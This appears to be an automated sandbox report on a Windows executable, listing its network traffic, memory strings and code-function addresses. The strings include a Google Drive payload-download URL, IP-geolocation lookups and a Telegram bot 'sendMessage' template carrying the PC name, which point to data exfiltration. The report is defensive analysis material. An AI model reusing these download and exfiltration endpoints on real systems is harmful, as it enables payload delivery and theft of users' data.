Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 07 Mar 2025 15:16:13 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E3E000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E50000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E3E000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E22000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E50000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: OeM750ajqm.exe, OeM750ajqm.exe, 00000004.00000002.2525450879.000000000040A000.00000008.00000001.01000000.00000004.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: OeM750ajqm.exe, 00000003.00000000.1282960311.000000000040A000.00000008.00000001.01000000.00000004.sdmp, OeM750ajqm.exe, 00000003.00000002.1447703296.000000000040A000.00000004.00000001.01000000.00000004.sdmp, OeM750ajqm.exe, 00000004.00000002.2525450879.000000000040A000.00000008.00000001.01000000.00000004.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E3E000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E50000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036DEA000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036DDB000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036DEA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036DE5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: OeM750ajqm.exe, 00000004.00000002.2533503788.00000000082A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1CJUE5aKHdgpZk5l1u_PHfiJdD52D
Source: OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP
Source: OeM750ajqm.exe, 00000004.00000003.1651744557.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
Source: OeM750ajqm.exe, 00000004.00000003.1651744557.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066BD000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP&export=download
Source: OeM750ajqm.exe, 00000004.00000003.1651744557.00000000066D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP&export=download.c
Source: OeM750ajqm.exe, 00000004.00000003.1651744557.00000000066D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP&export=downloadcn
Source: OeM750ajqm.exe, 00000004.00000003.1651744557.00000000066D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP&export=downloadu
Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036CCE000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036D3D000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E3E000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036CCE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036CF8000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036D3D000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E3E000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036D59000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E50000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/4
Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 3_2_00405640 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 3_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 3_2_00406ADA
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 3_2_6D6C1B28
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_00406ADA
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0652C738
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0652C468
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0652D278
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06525370
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0652C146
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06526FC8
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0652CFA9
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0652CCD8
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06529DE0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0652CA08
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0652E988
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065269A0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06523E09
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06523AB1
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0652E97B
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0652F961
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065229EC
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F7B78
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F2300
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F8FB0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FA0E0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F81D0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FEE5F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F1A50
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F1A41
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FAE7F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F4A78
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F6E72
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F6E70
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FEE70
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FCE6F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F4A68
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F6A18
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F4610
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FAA00
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F4620
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F4ED0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F72C8
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F4EC0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F22F0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FF2F0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F1E98
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FAE90
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FCE80
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F72B8
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F1EA8
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F2758
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F2748
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F7B77
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F531A
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FD310
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FB310
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FF300
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FD300
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F5328
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F7722
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F7720
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FB320
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F5BD8
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F97C0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FD791
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FF790
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FF781
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F5780
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F2BB0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FB7B0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F97B0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F2BAF
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F8FA1
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FD7A0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FB7A0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F345F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F9C50
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F0040
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FBC40
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F6478
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F3460
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FDC1F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F001A
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F3008
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F3007
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F9C3F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F6030
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FDC30
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FBC2F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F6021
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FFC20
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FC0D0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FA0D0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FE0C0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FC0C0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F08F0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F08E0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F0498
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F0489
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F6488
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F38B8
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FE0B0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FA55F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FE550
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FC54F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F0D48
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FE540
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FA570
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FC560
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FE9D0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F15F8
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FC9F0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FA9F0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F15E8
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FE9E0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065FC9E0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F1190
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_065F11A0
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06633B58
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06634B20
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06637160
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06634467
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663596A
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663C769
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06631B68
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06639C68
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663F268
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663C770
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06638470
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06632477
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06634478
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06635978
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663F278
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663AF78
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663DA7F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663B442
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06630040
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06635E40
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663F740
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06631248
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06638948
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06633B48
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663DF48
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663B450
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06637150
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06639C5A
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663DF58
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06631B58
